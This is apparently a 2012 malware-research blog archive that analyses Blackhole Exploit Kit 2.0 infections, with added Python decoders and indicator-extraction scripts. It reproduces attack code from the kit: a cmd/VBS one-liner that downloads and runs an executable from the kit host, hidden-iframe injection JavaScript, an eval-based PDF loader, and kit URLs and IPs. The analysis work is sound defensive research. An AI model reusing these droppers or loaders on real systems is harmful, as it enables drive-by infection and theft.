1.1. Updating/installing the old Java 1.6.0 update, i.e. the vulnerable version... (I really hope the below URL or related URLs at sun.com get deleted soon!)
 <object 
classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"
codebase="h00p://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0"
WIDTH="200" HEIGHT="200" >
1.2. Once your browser has the vulnerable Java installed, it downloads a malicious Java applet with a zero-day PoC, exploiting it for arbitrary execution of shellcode that downloads another evil binary..
 <PARAM NAME="ARCHIVE" VALUE="h00p://THIS-HOST-ADDRESS/links/anybody_miss-knowing.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn">
<param name="type" value="application/x-java-applet;version=1.6">
↑by the time we got the URL the applet was not accessible anymore, so we cannot describe more of it.

2. The infection vector using MSXML2.XMLHTTP/CVE-2010-2561:

2.1. Opening ActiveXObject + creating 3 objects: adodb.stream, Shell.Application, and msxml2.XMLHTTP
2.2. Linked to ./anybody_miss-knowing.php?[specific parameter] to download the exploit
2.3. If this exploit works (CVE-2010-2561), it will drop you an exe (.//..//c175065.exe)
2.4. The ActiveX command ShellExecute is used to execute the payload (this shellcode was using the format explained in the previous post-->>[URL])

The logs of the above steps...
ActiveXObject: msxml2.xmlhttp
ActiveXObject: acropdf.pdf
[HTTP] URL: x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002 (Status: 200, Referrer: http://69.194.192.203/links/anybody_miss-knowing.php)
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (adodb.stream)
ActiveXObject: adodb.stream
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (Shell.Application)
ActiveXObject: shell.application
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (msxml2.XMLHTTP)
ActiveXObject: msxml2.xmlhttp
[Microsoft XMLHTTP ActiveX] open('GET', 'x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm', False)
[Microsoft XMLHTTP ActiveX] send
[Microsoft XMLHTTP ActiveX] Fetching from URL x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm (method: GET)
[Adodb.Stream ActiveX] open
[Adodb.Stream ActiveX] Write
[Adodb.Stream ActiveX] SaveToFile (.//..//c175065・exe)
[Adodb.Stream ActiveX] Close
[Shell.Application ActiveX] ShellExecute command: .//..//c175065・exe
3. PDF Exploitation - Slight New Changes Detected..

We have a good sample of this, so we can say more. The PluginDetect looks at your Adobe version and then drops the PDF exploit. But slight changes were found compared to the previous code: it is not using splx() anymore. Reason? Yes, to avoid detection, and that cheap idea works! The way this code detects the Adobe version is as below (same as before..):
PluginDetect.initScript();
PluginDetect.getVersion(".");
pdfver=PluginDetect.getVersion("AdobeReader");
It redirects you to the evil PDF download URL below (same as before..):
function x(s)
{
d=[];
for(i=O;i<s.length;i++)
{
k=(s.charCodeAt(i)-46).toString(16);
if(k.length==1)k="O"+k;
d.push(k);
};
return d.join("");
}
end_redirect=function()
{
};
window.onbeforeunload=function()
or, depending on the version, goes to the NEW BHEK2 URL with the evil IFRAME now:
show_pdf2=function(src)
{
var pifr=document.createElement('IFRAME');
pifr.setAttribute('width',1);
pifr.setAttribute('height',1);
pifr.setAttribute('src',src);
document.body.appendChild(pifr)
};
show_pdf2(window.location+"?mkk="+x("ebOf8")+"&jiypmeg="+x("m")+"&eawqt=O337O3O2O737O6343433&ytejxs="+x(pdfver.join(".")));
Which was reversed and runs as below..

[iframe redirection] x.x.x.x/links/anybody_miss-knowing.php -> x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
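The x(s) routine above is the encoding behind the request parameters: each character becomes its char code minus 46, written as two hex digits. The page's own call show_pdf2(... x("eb0f8") ... x("m") ... x(pdfver.join(".")) ...) (the author's neutralized copy writes 0 as O) tells us that mkk, jiypmeg and ytejxs are x()-encoded, and that ytejxs carries the Adobe Reader version PluginDetect detected. The Python below is an added example, not the kit's code or the author's; it inverts x() and applies it to the request URL from the redirection log above. Which other parameters use the encoding is an assumption: eawqt is hard-coded in the page's JavaScript rather than passed through x(), so decode_query() decodes any even-length hex value on a best-effort basis.

```python
from urllib.parse import parse_qsl, urlsplit


def encode_bhek_param(text):
    """The landing page's x(s): every character becomes (charCode - 46) as two hex digits."""
    if any(ord(c) < 46 for c in text):
        raise ValueError("x() only handles characters with code >= 46")
    return "".join(f"{ord(c) - 46:02x}" for c in text)


def decode_bhek_param(hexstr):
    """Inverse of x(s): read two hex digits at a time and add 46 back."""
    if not hexstr or len(hexstr) % 2 or not all(c in "0123456789abcdefABCDEF" for c in hexstr):
        raise ValueError("not an x()-encoded value")
    return "".join(chr(int(hexstr[i:i + 2], 16) + 46) for i in range(0, len(hexstr), 2))


def decode_query(url):
    """Decode every x()-encoded-looking value in a BHEK2 request URL.

    Values that are not even-length hex (the random-looking alphabetic tokens such
    as cpsn or azme) are passed through unchanged. Only mkk, jiypmeg and ytejxs are
    shown on the page being built with x(); other hex-looking values are decoded
    on a best-effort basis and may be meaningless (assumption)."""
    decoded = {}
    for key, value in parse_qsl(urlsplit(url).query):
        try:
            decoded[key] = decode_bhek_param(value)
        except ValueError:
            decoded[key] = value
    return decoded


# Request URL as logged on the page ([iframe redirection] line), IP masked by the author.
LOGGED_URL = ("x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f"
              "&eawqt=03370302073706343433&ytejxs=0b000300020002")


if __name__ == "__main__":
    for k, v in decode_query(LOGGED_URL).items():
        print(f"{k} = {v!r}")
```

Decoding ytejxs=0b000300020002 gives 9.1.0.0, i.e. the Reader version the victim browser reported, and mkk=373402380a gives back the literal eb0f8 from the page's script. For detection this means the version fingerprint is recoverable from proxy logs even though the parameter names are randomized per campaign: a dotted version string hiding behind a hex value is a stronger indicator than any single parameter name.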
This means the previous PDF version checking used in BHEK 1.3.2 (see below) is gone, although the same PluginDetect code base is still in use! It is understandable, since BHEK2 uses a longer download URL format with more parameters.. It is important evidence that the PluginDetect code has also started to be changed..
Function spl3(){
iF (pdFver「O」 > O && pdFver「O」 < 8){
exec7 = O;
show_pdF('./data/ap1.php?F=F4dFb')
}
else iF ((pdFver「O」 == 8) || (pdFver「O」 == 9 && pdFver「1」 <= 3)){
exec7 = O;
show_pdF('./data/ap2.php')
}
spl4()
*) There are at least 5 to 6 ways of dropping exploits via this evil plugin; in the sample we grabbed, only 3 (three) infection traces were detected.

The PDF Exploit Used (the JavaScript part below has new code..)

As described above, there are 2 (two) PDF exploits used in the PluginDetect logic; in this case both lead to two files with the same logic (different md5). This PDF has an interesting way which wasn't used in previous PDF exploits.. The format is the same and contains three parts: JavaScript, exploit code & shellcode, as per the snips pasted below (all code is neutralized/uninfected/useless code..). Exploits:
<<
/Keywords(3d40401i3d3o3h4244253h463h3q441i…
1l1o1l1o1l1o1l1o1l1o1l1o1l1o1l161f3h463h3q441i443d…
1i463l3h473h42323h42433l3r3q1i443r2r44423l3q3j1c1d…
3d3n1d233o3r48333k3h3h253b2h1l1f4340423d49233o3r48…
3j1i3i423r3p2b3k3d422b3r3g3h1c3f1d234d423h4445423q…
3r3q143b3m1m1c3b2h1l1d4b3b2h1p251b1b233i3r421c3b2h…
292a2929292929292929292929292p29292929292929293548…
3b3o3o1m1f25453q3h433f3d403h1c1b191k1k1b1d233b3o3o…
Shellcode:
 /CreationDate(66,83,e4,fc,fc,85,…
,10,83,c3,05,ff,e3,68,6f,6e,00,00,68,75,…
,70,3a,2f,2f,36,39,2e,31,39,34,2e,31,39,…
>>
JavaScript:
<xfa:script contentType='application/x-javascript'>
with(event){
k=target["eva"+"l"];
if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.keywords;}

s="";
z=a;
for(i=0;i<a.length;i+=2){
s+=String.fromCharCode(parseInt(z.substr(i,2),28));}
k(s);
}
</xfa:script>
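The XFA script above undoes the /Keywords encoding two characters at a time with parseInt(z.substr(i,2),28): every character of the hidden JavaScript is written as a two-digit base-28 number (digits 0-9 then a-r). The d0..d94 attribute values of the landing page's "google" element use the same pairs, with &, %, ^, $, _ characters dropped in between. The Python below is an added example, not code from the page or the kit; it decodes the fragments visible above. Treating the non-alphanumeric separators as junk to skip is an inference from the fragments themselves: under that assumption d0 decodes to the start of a try block declaring PluginDetect and the /Keywords head decodes to app.alert=event., which is how one would confirm it on a full sample.

```python
import re

# Anything outside the base-28 alphabet (0-9, a-r) is a separator/junk character.
_NOT_BASE28 = re.compile(r"[^0-9a-r]")
_ALPHABET = "0123456789abcdefghijklmnopqr"


def decode_base28(encoded):
    """Decode a string of two-digit base-28 numbers into text.

    Mirrors the PDF loop `String.fromCharCode(parseInt(z.substr(i,2),28))`.
    Separator characters are dropped first (assumption, see lead-in) and a trailing
    unpaired digit, left by the author's "..." truncation, is ignored."""
    digits = _NOT_BASE28.sub("", encoded.lower())
    return "".join(chr(int(digits[i:i + 2], 28)) for i in range(0, len(digits) - 1, 2))


def encode_base28(text):
    """Inverse of decode_base28, useful for building test data or signature strings."""
    out = []
    for ch in text:
        n = ord(ch)
        if n >= 28 * 28:
            raise ValueError("code point does not fit in two base-28 digits")
        out.append(_ALPHABET[n // 28] + _ALPHABET[n % 28])
    return "".join(out)


# Fragments exactly as they appear on the page (the "..." is the author's truncation).
LANDING_D0 = "&4442494b46%3d42142o3o%453j3l3q2c^3h44"
LANDING_D1 = "3q144449&403h3r3i14$3e15251645_3q3g3h3"
PDF_KEYWORDS_HEAD = "3d40401i3d3o3h4244253h463h3q441i"


def decode_page_fragments():
    """Decode the visible fragments; returns a dict so callers can inspect each piece."""
    return {
        "d0": decode_base28(LANDING_D0),
        "d1": decode_base28(LANDING_D1),
        "keywords": decode_base28(PDF_KEYWORDS_HEAD),
    }


if __name__ == "__main__":
    for name, text in decode_page_fragments().items():
        print(f"{name}: {text!r}")
```

Because the alphabet stops at r, a long run of pairs whose second character never exceeds r is itself a cheap static indicator for this family of loaders, and encode_base28("PluginDetect") gives the exact pair sequence a content signature would look for in the attribute data.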
Note: I wrote in a previous post about the JavaScript used in PDFs like this one, but the PDF/JS logic used has changed. Please take note.. The last part of the shellcode was actually the URL leading to the payload to be dropped on the users, with the URI details below:
0x0184 /phttp://x.x.x.x/links/anybody_miss-knowing.php?cmpspxc=373402380a&jwk=03370302073706343433&ntzziqi=03&gbks=coi&swlmlswl=culvtnu
The collection of evil junk we analyzed is as follows. PS: I made a mistake and lost the PE payload, unsaved because of a proxy operation; I couldn't get the payload in the attempt I made afterward, it was a one-time shot.. Sorry for not being able to analyze it..

List of VirusTotal results for each unique sample with initial AV detection ratio:

FILENAME                  MD5                               DETECT RATIO
------------------------------------------------------------------------
index.html                9f7ea93cfc911305084c16fb3aeb6517  (18 / 42)
js.js                     8c53450b115b26d4144eac9d5f11852e  ( 0 / 43)
anybody_miss-knowing.php  02746b26613d881314d84f3b51d1ad97  ( 3 / 42)
acropdf.pdf               b72c668b370cc7271094836ad6180d5e  ( 8 / 43)
acropdf2.pdf              f78b18ac786199548e647d94da0555ad  ( 8 / 43)
↑Conclusion:

New modifications/changes in the landing page's obfuscated code and some recoding in the PluginDetect of BHEK2 are starting to be seen; the detection ratio of the landing page is currently low for this reported case, so I guess they got what they want, at this moment.

Not new stuff, but I add it anyway: the landing page is covered well by several forwarding steps and is not linked directly from the global link such as spam. They currently use a simple redirector for it, which passes the correct parameters to the landing page, and only those redirector URLs can be found in spam mails.

And, as announced everywhere, the payload download links generated from the BHEK2 landing page are indeed becoming longer, but as written on @kafeine's site, these findings contain more (3 or 4) parameters per request, not one or two long strings as first mentioned elsewhere. See the snips below (real case samples):

blah.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
blah.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn
blah.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm
Moreover, about those links: if you have a lead, then be careful with it, since you may only get one chance to grab it. In dealing with BHEK2, better research those infectors as a group rather than doing it alone. I lost my payload for this reason..

Reference: (The order is unsorted.. No reason..)

1. Contagio: CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime)
2. Malware don't need Coffee: Fast look at an infection by a Blackhole Exploit Kit 2.0
3. Trustwave SpiderLabs: Blackhole Exploit Kit v2
4. Malware don't need Coffee: Behind the Captcha or Inside Blackhole Exploit Kit 2.0 - Exploit Kit Administration Panel
5. XyliBox : Blackhole 2.0

Blackhole Previous Versions:

via Xylibox: v1.20, v1.21, v1.23 & Malware don't need Coffee: v.1.25

#MalwareMustDie!

Wednesday, September 19, 2012

I just finished handling a local infection case today; behind this case is the beloved Blackhole exploit kit. Some WinXP machines, because of third-party software compatibility trouble, cannot install Microsoft's critical patch (MS10-042) properly; this patch is for the infamous CVE-2010-1885, a critical vulnerability in the MPC::HexToNum function in helpctr.exe (a.k.a. the hcp://URL flaw). And these clients accidentally opened a spam mail containing the BHEK infected URL (some of you like to call it the "BHEK landing page"), downloading a payload which the installed antivirus software cannot detect yet.

That just happened today and really made my day. Since the flaw was fixed by Microsoft about 2 years ago, I never expected to see unpatched systems still having this flaw, yet they do exist, a bunch of them. Since there is some possibility that other XP users are running a similar risk, I dare myself to write up the reversing of this infection for your information in handling similar cases.


The infector was a BHEK at 85.17.165.22, which appears to have been up for less than 24h, with reports here--->>[URL-QUERY-LINK]
The landing page is: h00p://85.17.165.22/main.php?page=9adab93ef87c3421

And it has the below infection components:
/Gam.jar            EXPL: Java/CVE-2012-1723 (see the explanation below)
/data/field.swf     EXPL: SWF/CVE-2011-0611 --> shellcode --> same payload
/data/ap1.php       EXPL: JS/PDF.PdfCtrl old ver.  SAV: AcroPDF.PDF --> shellcode --> same payload
/data/ap2.php       EXPL: JS/PDF.PdfCtrl new ver.  SAV: AcroPDF.PDF --> shellcode --> same payload
/w.php?f=f4dfb&e=1  EXPL: Java/CVE-2012-1723  SAV: Gam.jar --> shellcode --> same payload
/w.php?f=f4dfb&e=2  EXPL: CVE-2010-2561/msxml2.XMLHTTP  SAV: .//..//6f9d07d.exe --> same payload
/w.php?f=f4dfb&e=5  EXPL: CVE-2010-1885/hcp:// vuln  SAV: %TEMP%\file.exe
↑See the last line closely: that is the case I will describe here. If you deobfuscate the landing page well, you will see the BHEK plugin-detect code; just in case, my neutralized deobfuscated code is here: --->>[PASTEBIN]. At line 1790 of it you will see code like this:
Function spl4(){
try {
For (var i = O, m; i < navigator・plugins・length; i ++ ){
var name = navigator・plugins「i」.name;
iF (name.indexOF('Media Player') !=- 1){
m = document・createElement('IFRAM3');
m.setAttribute('src', './data/hhcp.php?c=F4dFb');
m.setAttribute('width', O);
m.setAttribute('height', O);
document・body「'appendChild'」(m)
This leads you to the downloaded HTML file at:
h00p://85.17.165.22/data/hhcp.php?c=F4dFb
And this file contains further obfuscated code like this: the eval can be decoded as per the picture below, and it yields an iframe containing the exploit and, with it, an arbitrary command execution. The format of the malicious iframe is:
<iframe src="xxxxx=<script defer>Run(yyyyy);</script>">
//legend:
xxxxx = CVE-2010-1885 PoC strings
yyyyy = arbitrary executable command
If you compare "xxxxx" with the PoC of CVE-2010-1885 you will see the similarity; here is the PoC link-->http://seclists.org/fulldisclosure/2010/Jun/205. The "yyyyy" part is a combination of cmd and Windows (Visual Basic) Script commands:
cmd /c echo FileName = "%TEMP%\file・exe">>%TEMP%\
go・vbs&&echo url="http://x・x・x・x/w・php?f=f4dfb&e=5" >>%TEMP%\
go・vbs&&echo Set objHTTP = CreateObject("MSXML2・XMLHTTP")>>%TEMP%\
go・vbs&&echo Call objHTTP・Open("GET", url, False)>>%TEMP%\
go・vbs&&echo objHTTP・Send>>%TEMP%\
go・vbs&&echo set oStream = createobject("Adodb・Stream")>>%TEMP%\
go・vbs&&echo Const adTypeBinary = 1 >>%TEMP%\
go・vbs&&echo Const adSaveCreateOverWrite = 2 >>%TEMP%\
go・vbs&&echo Const adSaveCreateNotExist = 1 >>%TEMP%\
go・vbs&&echo oStream・type = adTypeBinary >>%TEMP%\
go・vbs&&echo oStream・open >>%TEMP%\
go・vbs&&echo oStream・write objHTTP・responseBody>>%TEMP%\
go・vbs&&echo oStream・savetofile FileName, adSaveCreateNotExist >>%TEMP%\
go・vbs&&echo oStream・close>>%TEMP%\
go・vbs&&echo set oStream = nothing >>%TEMP%\
go・vbs&&echo Set xml = Nothing >>%TEMP%\
go・vbs&&echo Set WshShell = CreateObject("WScript・Shell") >>%TEMP%\
go・vbs&&echo WshShell・Run FileName, 0, True >>%TEMP%\
go・vbs&&echo Set FSO = CreateObject("Scripting・FileSystemObject") >>%TEMP%\
go・vbs&&echo FSO・DeleteFile "%TEMP%\go・vbs" >>%TEMP%\
go・vbs|cscript %TEMP%\
go・vbs>nul
(PS: the above code was neutralized and NOT malicious!)
↑Which means:
Download the file from 85.17.165.22/w・php?f=f4dfb&e=5 and save it as %TEMP%\file.exe via an MSXML2・XMLHTTP stream, then run it via WshShell.Run and DELETE the saved file afterwards. (This was the reason I couldn't get the sample file from the infected PC and had to extract it out of memory manually.)
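The chain above is a one-liner that writes go.vbs with a series of echo redirects and then pipes into cscript. As an added example (not code from the original post), the script below rebuilds the VBS that such a command line would write and pulls the download URL, drop path and self-delete flag out of it, so the dropper can be triaged from a process command line without running anything. The sample command line is constructed from the neutralized listing above with the ・ characters restored to dots; x.x.x.x is the post's own masking of the host.

```python
"""Rebuild the VBS dropper written by a `cmd /c echo ... >> go.vbs ... | cscript` chain
and extract its indicators without executing it."""
import re
from collections import OrderedDict

# Constructed sample: the echo chain from the neutralized hhcp.php above, with the
# '・' characters restored to '.' and the wrapped lines joined into one command line.
SAMPLE_CMDLINE = (
    'cmd /c echo FileName = "%TEMP%\\file.exe">>%TEMP%\\go.vbs'
    '&&echo url="http://x.x.x.x/w.php?f=f4dfb&e=5" >>%TEMP%\\go.vbs'
    '&&echo Set objHTTP = CreateObject("MSXML2.XMLHTTP")>>%TEMP%\\go.vbs'
    '&&echo Call objHTTP.Open("GET", url, False)>>%TEMP%\\go.vbs'
    '&&echo objHTTP.Send>>%TEMP%\\go.vbs'
    '&&echo set oStream = createobject("Adodb.Stream")>>%TEMP%\\go.vbs'
    '&&echo Const adTypeBinary = 1 >>%TEMP%\\go.vbs'
    '&&echo Const adSaveCreateOverWrite = 2 >>%TEMP%\\go.vbs'
    '&&echo Const adSaveCreateNotExist = 1 >>%TEMP%\\go.vbs'
    '&&echo oStream.type = adTypeBinary >>%TEMP%\\go.vbs'
    '&&echo oStream.open >>%TEMP%\\go.vbs'
    '&&echo oStream.write objHTTP.responseBody>>%TEMP%\\go.vbs'
    '&&echo oStream.savetofile FileName, adSaveCreateNotExist >>%TEMP%\\go.vbs'
    '&&echo oStream.close>>%TEMP%\\go.vbs'
    '&&echo set oStream = nothing >>%TEMP%\\go.vbs'
    '&&echo Set xml = Nothing >>%TEMP%\\go.vbs'
    '&&echo Set WshShell = CreateObject("WScript.Shell") >>%TEMP%\\go.vbs'
    '&&echo WshShell.Run FileName, 0, True >>%TEMP%\\go.vbs'
    '&&echo Set FSO = CreateObject("Scripting.FileSystemObject") >>%TEMP%\\go.vbs'
    '&&echo FSO.DeleteFile "%TEMP%\\go.vbs" >>%TEMP%\\go.vbs'
    '|cscript %TEMP%\\go.vbs>nul'
)


def split_cmd(cmdline):
    """Split a cmd.exe one-liner on '&&' and '|' that sit outside double quotes
    (cmd does not treat those characters as separators inside quotes)."""
    parts, buf, quoted, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            quoted = not quoted
        if not quoted and cmdline.startswith('&&', i):
            parts.append(''.join(buf)); buf = []; i += 2
            continue
        if not quoted and ch == '|':
            parts.append(''.join(buf)); buf = []; i += 1
            continue
        buf.append(ch); i += 1
    parts.append(''.join(buf))
    return [p.strip() for p in parts if p.strip()]


ECHO_RE = re.compile(r'^(?:cmd\s+/c\s+)?echo\s(.*?)\s*>>\s*(\S+)$', re.IGNORECASE)
RUN_RE = re.compile(r'^[cw]script\b', re.IGNORECASE)


def reconstruct_dropper(cmdline):
    """Return ({target_path: [script lines in write order]}, runner segment or None)."""
    files, runner = OrderedDict(), None
    for seg in split_cmd(cmdline):
        m = ECHO_RE.match(seg)
        if m:
            files.setdefault(m.group(2), []).append(m.group(1))
        elif RUN_RE.match(seg):
            runner = seg
    return files, runner


URL_RE = re.compile(r'https?://[^\s"\']+')


def extract_iocs(script_lines):
    """Download URL(s), the path the payload is saved to, and whether the script deletes itself."""
    text = '\n'.join(script_lines)
    m = re.search(r'FileName\s*=\s*"([^"]+)"', text)
    return {
        'urls': URL_RE.findall(text),
        'drop_path': m.group(1) if m else None,
        'self_delete': bool(re.search(r'\.DeleteFile\b', text)),
    }


if __name__ == '__main__':
    files, runner = reconstruct_dropper(SAMPLE_CMDLINE)
    for path, lines in files.items():
        print('--- reconstructed %s (%d lines)' % (path, len(lines)))
        print('\n'.join(lines))
        print(extract_iocs(lines), '| run by:', runner)
```

The quote-aware splitter matters here: the URL's `&e=5` sits inside double quotes, so a naive split on `&` would cut the download URL in half and the indicator would be lost.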
The worse part is that almost everyone misses this tiny obfuscated file; even on VirusTotal ONLY 3 (three) products detect it:
MD5: 5629b24e0faae7b42127df9f592fed48
File size: 5.2 KB ( 5326 bytes )
File name: hhcp.php@c=f4dfb
File type: HTML
Tags: html cve-2010-1885 exploit
Detection: 3 / 43
Analysis date: 2012-09-19 19:36:44 UTC
URL: ------>>[VIRUS-TOTAL]
Furthermore the payload shows a "fake" Intel logo (see picture), and it runs these two processes:
PID  MEM         PATH                  Event
216  2007536674  %path%unknown.exe     Global\crypt32LogoffEvent   // stays resident as a process
840  2088831062  %System%svchost.exe                               // kicks off svchost
I don't have enough time for a deep analysis of this binary, so a quick one. Binary snapshot:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 A9 0B B2 8A ED 6A DC D9 ED 6A DC D9 ED 6A DC D9 .....j...j...j..
0090 EB 49 D6 D9 E6 6A DC D9 ED 6A DD D9 F3 6A DC D9 .I...j...j...j..
00A0 73 4A FF D9 EC 6A DC D9 B4 49 CF D9 EC 6A DC D9 sJ...j...I...j..
00B0 82 75 D8 D9 EC 6A DC D9 52 69 63 68 ED 6A DC D9 .u...j..Rich.j..
00C0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 07 00 ........PE..L...
00D0 A8 78 57 50 00 00 00 00 00 00 00 00 E0 00 03 01 .xWP............
Section:
.text 0x44000(snipped)
.rdata 0x45000 0x2d84 11776
.data 0x48000 0xd38 3584
.adata 0x49000 0x10 512
.CRT 0x4b000 0x10 512 <--- cryptor pack
.rsrc 0x4c000 0x1a18 7168
Entry Point: 0x1e490
Compile Time: 0x505778A8 [Mon Sep 17 19:23:20 2012 UTC]
Packer: unknown
Shortly: some suspicious calls were detected while it stays resident as a process. Below is my adventure in the reversing graph; from the way it steals so much information I guess it is a variant of the ZeuS Trojan (ZeuS/Zbot)↓ In the meantime VirusTotal detects it as below:
MD5: c559573fc5ab9862607e4fa4b2edfc04
File size: 294.0 KB ( 301056 bytes )
File name: unknown.exe
File type: Win32 EXE
Detection: 19 / 43
Analysis date: 2012-09-19 17:58:31 UTC
URL:---->>[VIRUS-TOTAL]
The current malware names are:
F-Secure                 : Trojan.Generic.KD.731435
Microsoft : PWS:Win32/Zbot
VIPRE : Trojan.Win32.Generic!BT
Symantec : Trojan.Gen
TrendMicro : TROJ_GEN.R42CDII
McAfee-GW-Edition : PWS-Zbot.vo!a
Fortinet : W32/Androm.DW!tr
TrendMicro-HouseCall : TROJ_GEN.R42CDII
Avast : Win32:Trojan-gen
Ikarus : Trojan-Spy.Win32.Zbot
GData : Trojan.Generic.KD.731435
Kaspersky : HEUR:Trojan.Win32.Generic
BitDefender : Trojan.Generic.KD.731435
McAfee : PWS-Zbot.gen.ana
Panda : Trj/Genetic.gen
AhnLab-V3 : Spyware/Win32.Zbot
AntiVir : TR/Injector.air.1
Sophos : Mal/EncPk-AGK
Comodo : UnclassifiedMalware
The moral of the story is: do not underestimate "any" exploit implemented in an exploit kit. Those exploits are picked well and are meant for a well-planned infection, even the one you think has the smaller chance to infect; when it hits, you may get yourself an epidemic.

And, to malware analysts/researchers (etc.): understanding how an infection works by reversing the malicious and exploit code yourself will change the way you think about handling malware in the future, trust me. You may carry on with whatever automation system/tool you use, but at least once, try to figure it out on your own! I won't sell you any crap.

#MalwareMustDie!

Tuesday, 18 September 2012

Monitoring the activity of one Blackhole (in short: BHEK) host means spending days on it. I picked one positive BHEK host at 203.91.113.6 and stuck to it for about a week; this host is quite active as a malware infector, which is one of the reasons I picked it.
I think I was careful enough in monitoring it, so I don't think they even sensed being monitored, which gave me plenty of time to analyze it. Here's what I found...
  
Background

The spam email containing a malicious link to this host on Sept 5th was what made me start monitoring it. Maybe some of you still remember this spam:
From: HM Revenue & Customs [mailto:refund.request@hmrc.gov.uk]
To: xxxx
Sent: 05 September 2012 xx:xx (time was varied)
Subject: Tax Refund Alert - Action Required
How to complain, ask for a review or make an appeal
Review process update
Review process - the first 12 months. Find out more
Claim Your Tax Refund Online
We identified an error in the [link]
↑This spam actually infected users with Cridex. At that time the domains used were gdeounitrg.com and gsigallery.net. URLQuery data also shows a long list of reported malware infectors coming from this host; you can access it here--->>[CLICK]. From that list we can see the recent infector domains below↓
virtual-geocaching.net
cedarbuiltok.net
thebummwrap.net
afgreenwich.net
bode-sales.net
cat-mails.net
centennialfield.net
blue-lotusgrove.net
dushare.net
If you look at each report listed in URLQuery by date, you will see that this host never uses the same domain for more than 2 days (max). Since the URLs listed are landing pages, I assume an email malvertising scheme.

Services used

During the initial monitoring period I detected the services below:
21/tcp   open     ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
136/tcp open profile
137/tcp open netbios-ns
138/tcp open netbios-dgm
139/tcp open netbios-ssn
389/tcp open ldap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
5000/tcp open UPnP
5050/tcp open mmcc
8009/tcp open ajp13
8080/tcp open http-proxy
A couple of days ago I realized it had filtered its previously open ports/services and added some more, so it now looks like this:
21/tcp   open     ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
135/tcp filtered msrpc <-----1
136/tcp filtered profile <-----1
137/tcp filtered netbios-ns <-----1
138/tcp filtered netbios-dgm <----1
139/tcp filtered netbios-ssn <-----1
389/tcp open ldap
445/tcp filtered microsoft-ds <-----1
636/tcp open ldapssl
1025/tcp filtered NFS-or-IIS <-------1
1337/tcp filtered waste
3001/tcp filtered nessusd <-----2
3128/tcp filtered squid-http <-----3
5000/tcp filtered UPnP
5050/tcp open mmcc
8009/tcp open ajp13
8080/tcp open http-proxy <---4
Legend:
1 = Windows services, never filtered previously
2 = nessus scanner daemon service
3 = squid proxy is running
4 = http web server
↑It filtered some TCP ports related to the Windows services. To make sure this is still the same Windows server as before, I re-checked its OS fingerprint every day:
Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW
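Comparing the two port listings by eye is error-prone once a host changes a dozen ports at once. As an added example (not tooling from the original post), the script below parses two nmap-style listings of the same host and reports which ports are new, which disappeared, and which went from open to filtered; the two listings embedded as sample input are the before/after scans shown above, with the arrow annotations removed.

```python
"""Diff two port scans of one host to spot newly filtered or newly exposed services."""
import re

# Constructed sample input: the two nmap listings from the post, annotations stripped.
SCAN_BEFORE = """
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
111/tcp  open  rpcbind
135/tcp  open  msrpc
136/tcp  open  profile
137/tcp  open  netbios-ns
138/tcp  open  netbios-dgm
139/tcp  open  netbios-ssn
389/tcp  open  ldap
636/tcp  open  ldapssl
1025/tcp open  NFS-or-IIS
5000/tcp open  UPnP
5050/tcp open  mmcc
8009/tcp open  ajp13
8080/tcp open  http-proxy
"""

SCAN_AFTER = """
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  filtered msrpc
136/tcp  filtered profile
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
389/tcp  open     ldap
445/tcp  filtered microsoft-ds
636/tcp  open     ldapssl
1025/tcp filtered NFS-or-IIS
1337/tcp filtered waste
3001/tcp filtered nessusd
3128/tcp filtered squid-http
5000/tcp filtered UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy
"""

PORT_RE = re.compile(r'^\s*(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)', re.MULTILINE)


def parse_ports(text):
    """nmap-style listing -> {(port, proto): (state, service)}."""
    return {(int(p), proto): (state, svc) for p, proto, state, svc in PORT_RE.findall(text)}


def diff_scans(before, after):
    """Compare two parsed scans of the same host."""
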